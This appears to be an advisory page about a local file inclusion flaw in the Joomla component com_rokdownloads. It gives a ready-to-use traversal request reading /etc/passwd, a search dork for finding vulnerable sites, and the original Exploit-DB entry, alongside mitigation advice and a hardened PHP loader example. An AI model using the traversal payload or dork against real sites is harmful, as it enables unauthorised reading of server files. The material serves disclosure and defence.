Vendor: Joomla Component com_rokdownloads
By: AtT4CKxT3rR0r1ST
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Inclusion
CWE: 22
Product Name: Joomla Component com_rokdownloads
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2020

Joomla Component com_rokdownloads Local File Inclusion

An attacker exploits this vulnerability by sending a crafted HTTP request to the vulnerable server. The value of the ‘controller’ parameter is used without validation when the component builds the path of the file it includes, so a directory-traversal sequence in that parameter makes the application include an arbitrary local file. For example, a request like www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 reads the /etc/passwd file.

Mitigation:

The component must not build an include path from the raw ‘controller’ parameter. It should validate the value before using it, accepting only a known controller name and rejecting path separators, ‘..’ sequences and null bytes, so that directory traversal is not possible.
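As an added illustration of that mitigation (example code written for this page, not source from the RokDownloads component or from Joomla), the following PHP resolves a ‘controller’ request value to a file only if it passes a strict character check, an allow-list of known controller names and a realpath containment check. The controller directory layout, the names ‘downloads’ and ‘categories’, and the function name resolveControllerFile are assumptions made for the example.

```php
<?php
// Added example (not the component's or Joomla's own code): a hardened controller
// loader. The weak pattern it replaces is building the include path directly from
// the request, e.g. require_once($dir . '/' . $_GET['controller'] . '.php'), which is
// what allows "../../../etc/passwd%00" to be included.
// Assumptions: controllers live in $controllerDir as <name>.php; $allowed is invented.
declare(strict_types=1);

/**
 * Return the absolute path of the controller file for $requested, or null
 * if the value is not acceptable. Three independent checks, so that a mistake
 * in one of them does not let a traversal through.
 */
function resolveControllerFile(string $requested, string $controllerDir, array $allowed): ?string
{
    // 1. Only plain identifiers: this rejects '/', '\', '.', '..' and NUL (%00) outright.
    if (!preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $requested)) {
        return null;
    }
    // 2. Allow-list: only controller names the component actually ships.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 3. Containment: the resolved file must exist and lie inside the controller directory.
    $base = realpath($controllerDir);
    $path = realpath($controllerDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demonstration against a temporary controller directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rokdl_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'downloads.php', "<?php // stub controller\n");

$allowed = ['downloads', 'categories']; // hypothetical controller names for the example

$cases = [
    'downloads',                                    // legitimate value -> loaded
    '../../../../../../../../../../etc/passwd%00',  // traversal as it appears in the advisory URL
    "../../../../../../../../../../etc/passwd\0",   // the same value after URL decoding (real NUL byte)
    'categories',                                   // allowed name whose file is missing -> rejected
];
foreach ($cases as $c) {
    $r = resolveControllerFile($c, $dir, $allowed);
    printf("%-45s => %s\n", addcslashes($c, "\0"), $r === null ? 'REJECTED' : 'load ' . basename($r));
}

unlink($dir . DIRECTORY_SEPARATOR . 'downloads.php');
rmdir($dir);
```

Run it with the PHP CLI; only the ‘downloads’ case resolves to a file, while both forms of the traversal value (URL-encoded and decoded) fail the first check before any path is built. The realpath step is deliberately kept even though the allow-list already suffices: it is the check that still holds if a later change to the allow-list or the regular expression weakens the earlier ones.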

Exploit-DB raw data:

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_rokdownloads&controller=[LFI]
www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00

####################################################################